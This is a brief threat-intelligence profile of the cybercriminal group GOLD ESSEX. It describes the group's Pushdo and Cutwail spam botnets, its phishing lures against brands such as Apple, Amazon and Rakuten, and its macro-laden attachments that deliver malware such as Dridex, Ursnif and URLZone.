GOLD ESSEX

GOLD ESSEX is a financially motivated cybercriminal threat group assessed with high confidence to operate the Pushdo and Cutwail botnets. Various versions of the Cutwail malware have been used by different threat groups to assemble multiple botnets since 2007. The only remaining active Cutwail botnet, frequently referred to as Cutwail version 2, is distributed by the Pushdo malware. In additional to downloading Cutwail, Pushdo may retrieve information stealing malware such as Pony. Cutwail utilizes an expressive template language that allows individual bots to generate spam emails with high variation based on instructions received from command and control servers. These emails are delivered on behalf of GOLD ESSEX's customers and frequently contain malware attachments or links to phishing pages. Japanese-language phishing lures regularly target credentials for popular brands such as Apple, Amazon, and Rakuten. Malware payloads are typically Office documents that contain embedded macros that execute PowerShell-based downloaders that retrieve malware like Gozi ISFB (Ursnif), Dridex (Bugat v5), or URLZone (Bebloh). Since March 2020, Cutwail has regularly distributed English-language spam emails intended to distribute the Dridex malware associated with botnet segment 10444.